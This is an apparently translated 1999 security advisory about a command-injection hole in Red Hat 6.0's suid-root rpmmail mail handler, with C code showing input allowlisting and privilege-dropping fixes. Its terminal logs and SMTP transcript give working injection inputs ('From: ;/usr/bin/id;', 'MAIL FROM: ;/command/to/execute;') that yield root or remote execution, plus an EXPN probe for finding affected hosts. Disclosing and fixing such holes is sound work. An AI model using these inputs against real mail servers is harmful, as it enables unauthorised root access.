Red Hat 6.0: local/remote vulnerability in the latest rpmmail
The supplementary CD of Red Hat 6.0 contains a package called rpmmail. Once installed, rpmmail has a serious root-level vulnerability: it can let an ordinary local or remote user obtain root privileges, or let a remote user execute arbitrary commands as "nobody".
Sending an e-mail to rpmmail@vulnerablehost makes /home/rpmmail/rpmmail (installed suid root by default, and invoked remotely through a .forward file) pass any command you like to system(3). The command does not necessarily run with root privileges, because of bash's handling of euid != uid of caller. system(3) invokes /bin/sh -c, but on the default setup of some Linux systems, for example SuSE 6.2, /bin/sh is linked to /bin/bash v2. As the system(3) manual page explains, the root part of this hole does not work where /bin/sh is bash version 2, because from bash version 2 on, /bin/sh drops its special privileges at startup. So on some systems with rpmmail installed there is a remote/local root hole, and on all of them any unprivileged user (the "others" group) can execute commands remotely.
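As an added illustration (not rpmmail's source, which this post does not show), the C below demonstrates the two controls that close this class of bug: validate the From: value against an allowlist, and hand it to the child as a single argv element through execl() after dropping privileges, instead of interpolating it into a system(3) command line. The function names and the notifier path are hypothetical.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Copy the value of a "From:" header into out, accepting only characters that
 * belong in a mailbox address. Returns 0 on success, -1 if the line is not a
 * From: header, is too long, or contains anything outside the allowlist (';',
 * '|', '`', '$', spaces...), i.e. exactly what the rpmmail injection relies on. */
int from_header_value(const char *line, char *out, size_t outlen)
{
    const char *allowed = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
                          "0123456789@._-+=";
    if (strncmp(line, "From:", 5) != 0) return -1;
    const char *p = line + 5;
    while (*p == ' ' || *p == '\t') p++;
    size_t n = strcspn(p, "\r\n");
    if (n == 0 || n >= outlen) return -1;
    for (size_t i = 0; i < n; i++)
        if (strchr(allowed, p[i]) == NULL) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* 1 if the header line would be accepted, 0 otherwise. */
int from_header_accepted(const char *line)
{
    char buf[256];
    return from_header_value(line, buf, sizeof buf) == 0;
}

/* Run a notifier with the sender as a single argv element. No /bin/sh -c is
 * involved, so nothing in the value is parsed as shell syntax, and the child
 * drops the suid-root identity itself instead of relying on the shell to do
 * it (bash 2 does, ksh does not). Returns the child's exit status (127 if the
 * notifier could not be executed) or -1 on a fork/wait error. */
int notify_sender(const char *notifier, const char *sender)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(126);
        execl(notifier, notifier, sender, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```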
The local hole:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c blah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$
----
After linking /bin/sh to /bin/ksh instead:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c blah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$
The remote hole:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
250 Mail accepted
quit
Confirming that a host is affected is very simple: the EXPN command shows whether the .forward entry exists:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500 (CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"
Source: Netease Virtual Community, Beijing site http://bj.netease.com [FROM: 202.106.250.155]